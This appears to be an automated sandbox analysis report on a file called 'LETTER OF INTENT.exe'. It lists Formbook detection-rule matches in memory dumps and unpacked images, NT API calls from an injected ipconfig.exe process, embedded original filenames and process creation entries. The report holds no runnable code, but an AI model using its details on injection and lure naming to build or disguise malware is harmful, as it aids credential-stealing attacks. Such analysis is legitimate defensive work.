            Source: 1.0.LETTER OF INTENT.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.LETTER OF INTENT.exe.4771d60.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.LETTER OF INTENT.exe.4771d60.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.0.LETTER OF INTENT.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.0.LETTER OF INTENT.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.LETTER OF INTENT.exe.342a3e4.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
            Source: 1.2.LETTER OF INTENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.LETTER OF INTENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.LETTER OF INTENT.exe.469f500.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.LETTER OF INTENT.exe.469f500.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.LETTER OF INTENT.exe.4747140.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.LETTER OF INTENT.exe.4747140.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.0.LETTER OF INTENT.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.0.LETTER OF INTENT.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.0.LETTER OF INTENT.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.0.LETTER OF INTENT.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.LETTER OF INTENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.LETTER OF INTENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.0.LETTER OF INTENT.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.0.LETTER OF INTENT.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.307845836.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.307845836.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.288819841.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000000.288819841.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.307789008.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.307789008.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.506165216.0000000002700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.506165216.0000000002700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.248115726.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.248115726.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000000.242299044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000000.242299044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.274895699.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000000.274895699.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000000.242704154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000000.242704154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 0_2_019268100_2_01926810
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 0_2_01926D580_2_01926D58
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 0_2_0192622A0_2_0192622A
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 0_2_0192624F0_2_0192624F
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 0_2_019262600_2_01926260
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 0_2_019268010_2_01926801
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 0_2_0192B1C00_2_0192B1C0
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 0_2_061C00060_2_061C0006
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 0_2_061C00400_2_061C0040
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_004010301_2_00401030
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_004011741_2_00401174
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_0041B9E61_2_0041B9E6
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_0041D2011_2_0041D201
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_0041C3FA1_2_0041C3FA
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_00408C6B1_2_00408C6B
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_00408C701_2_00408C70
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_0041BD571_2_0041BD57
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_00402D901_2_00402D90
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_0041CEDB1_2_0041CEDB
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_00402FB01_2_00402FB0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F622AE15_2_02F622AE
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F4FA2B15_2_02F4FA2B
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F5DBD215_2_02F5DBD2
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F503DA15_2_02F503DA
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ECEBB015_2_02ECEBB0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F62B2815_2_02F62B28
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F628EC15_2_02F628EC
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC20A015_2_02EC20A0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F620A815_2_02F620A8
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EAB09015_2_02EAB090
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F6E82415_2_02F6E824
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F5100215_2_02F51002
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EB412015_2_02EB4120
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E9F90015_2_02E9F900
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F62EF715_2_02F62EF7
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EB6E3015_2_02EB6E30
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F5D61615_2_02F5D616
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F61FF115_2_02F61FF1
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F6DFCE15_2_02F6DFCE
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F5D46615_2_02F5D466
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA841F15_2_02EA841F
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EAD5E015_2_02EAD5E0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F625DD15_2_02F625DD
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC258115_2_02EC2581
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F61D5515_2_02F61D55
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E90D2015_2_02E90D20
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F62D0715_2_02F62D07
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A1D20115_2_02A1D201
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A1B9E615_2_02A1B9E6
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A1CEDB15_2_02A1CEDB
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A02FB015_2_02A02FB0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A08C6B15_2_02A08C6B
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A08C7015_2_02A08C70
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A02D9015_2_02A02D90
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 02E9B150 appears 45 times
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_004185D0 NtCreateFile,1_2_004185D0
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_00418680 NtReadFile,1_2_00418680
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_00418700 NtClose,1_2_00418700
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_004187B0 NtAllocateVirtualMemory,1_2_004187B0
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_004185CF NtCreateFile,1_2_004185CF
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_0041867A NtReadFile,1_2_0041867A
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_004187AA NtAllocateVirtualMemory,1_2_004187AA
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9A50 NtCreateFile,LdrInitializeThunk,15_2_02ED9A50
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9860 NtQuerySystemInformation,LdrInitializeThunk,15_2_02ED9860
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9840 NtDelayExecution,LdrInitializeThunk,15_2_02ED9840
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED99A0 NtCreateSection,LdrInitializeThunk,15_2_02ED99A0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9910 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_02ED9910
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED96E0 NtFreeVirtualMemory,LdrInitializeThunk,15_2_02ED96E0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED96D0 NtCreateKey,LdrInitializeThunk,15_2_02ED96D0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9FE0 NtCreateMutant,LdrInitializeThunk,15_2_02ED9FE0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9780 NtMapViewOfSection,LdrInitializeThunk,15_2_02ED9780
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9710 NtQueryInformationToken,LdrInitializeThunk,15_2_02ED9710
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED95D0 NtClose,LdrInitializeThunk,15_2_02ED95D0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9540 NtReadFile,LdrInitializeThunk,15_2_02ED9540
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9A80 NtOpenDirectoryObject,15_2_02ED9A80
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9A20 NtResumeThread,15_2_02ED9A20
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9A00 NtProtectVirtualMemory,15_2_02ED9A00
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9A10 NtQuerySection,15_2_02ED9A10
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EDA3B0 NtGetContextThread,15_2_02EDA3B0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9B00 NtSetValueKey,15_2_02ED9B00
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED98F0 NtReadVirtualMemory,15_2_02ED98F0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED98A0 NtWriteVirtualMemory,15_2_02ED98A0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EDB040 NtSuspendThread,15_2_02EDB040
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9820 NtEnumerateKey,15_2_02ED9820
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED99D0 NtCreateProcessEx,15_2_02ED99D0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9950 NtQueueApcThread,15_2_02ED9950
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9660 NtAllocateVirtualMemory,15_2_02ED9660
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9670 NtQueryInformationProcess,15_2_02ED9670
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9650 NtQueryValueKey,15_2_02ED9650
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9610 NtEnumerateValueKey,15_2_02ED9610
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED97A0 NtUnmapViewOfSection,15_2_02ED97A0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9760 NtOpenProcess,15_2_02ED9760
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EDA770 NtOpenThread,15_2_02EDA770
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9770 NtSetInformationFile,15_2_02ED9770
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9730 NtQueryVirtualMemory,15_2_02ED9730
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EDA710 NtOpenProcessToken,15_2_02EDA710
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED95F0 NtQueryInformationFile,15_2_02ED95F0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9560 NtWriteFile,15_2_02ED9560
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED9520 NtWaitForSingleObject,15_2_02ED9520
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EDAD30 NtSetContextThread,15_2_02EDAD30
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A18680 NtReadFile,15_2_02A18680
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A18700 NtClose,15_2_02A18700
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A185D0 NtCreateFile,15_2_02A185D0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A1867A NtReadFile,15_2_02A1867A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A185CF NtCreateFile,15_2_02A185CF
            Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 98%
            Source: LETTER OF INTENT.exe, 00000000.00000002.249251957.0000000006110000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs LETTER OF INTENT.exe
            Source: LETTER OF INTENT.exe, 00000000.00000002.245569266.000000000340A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpaceChemSolver.dll@ vs LETTER OF INTENT.exe
            Source: LETTER OF INTENT.exe, 00000000.00000002.245113869.000000000108E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameConsoleSpecial.exeZ vs LETTER OF INTENT.exe
            Source: LETTER OF INTENT.exe, 00000000.00000002.248115726.00000000045B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs LETTER OF INTENT.exe
            Source: LETTER OF INTENT.exe, 00000000.00000002.247039012.00000000043F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs LETTER OF INTENT.exe
            Source: LETTER OF INTENT.exe, 00000000.00000002.245528197.0000000001CA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSpaceChemSolver.dll@ vs LETTER OF INTENT.exe
            Source: LETTER OF INTENT.exe, 00000001.00000002.309332574.000000000142F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs LETTER OF INTENT.exe
            Source: LETTER OF INTENT.exe, 00000001.00000002.308765964.000000000129F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs LETTER OF INTENT.exe
            Source: LETTER OF INTENT.exe, 00000001.00000000.242878191.000000000072E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameConsoleSpecial.exeZ vs LETTER OF INTENT.exe
            Source: LETTER OF INTENT.exe, 00000001.00000002.307970163.0000000001157000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs LETTER OF INTENT.exe
            Source: LETTER OF INTENT.exe, 00000001.00000002.307642624.0000000000D5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs LETTER OF INTENT.exe
            Source: LETTER OF INTENT.exe, 00000001.00000002.307730478.0000000000D6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs LETTER OF INTENT.exe
            Source: LETTER OF INTENT.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: LETTER OF INTENT.exeVirustotal: Detection: 25%
            Source: LETTER OF INTENT.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\LETTER OF INTENT.exe "C:\Users\user\Desktop\LETTER OF INTENT.exe"
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess created: C:\Users\user\Desktop\LETTER OF INTENT.exe C:\Users\user\Desktop\LETTER OF INTENT.exe
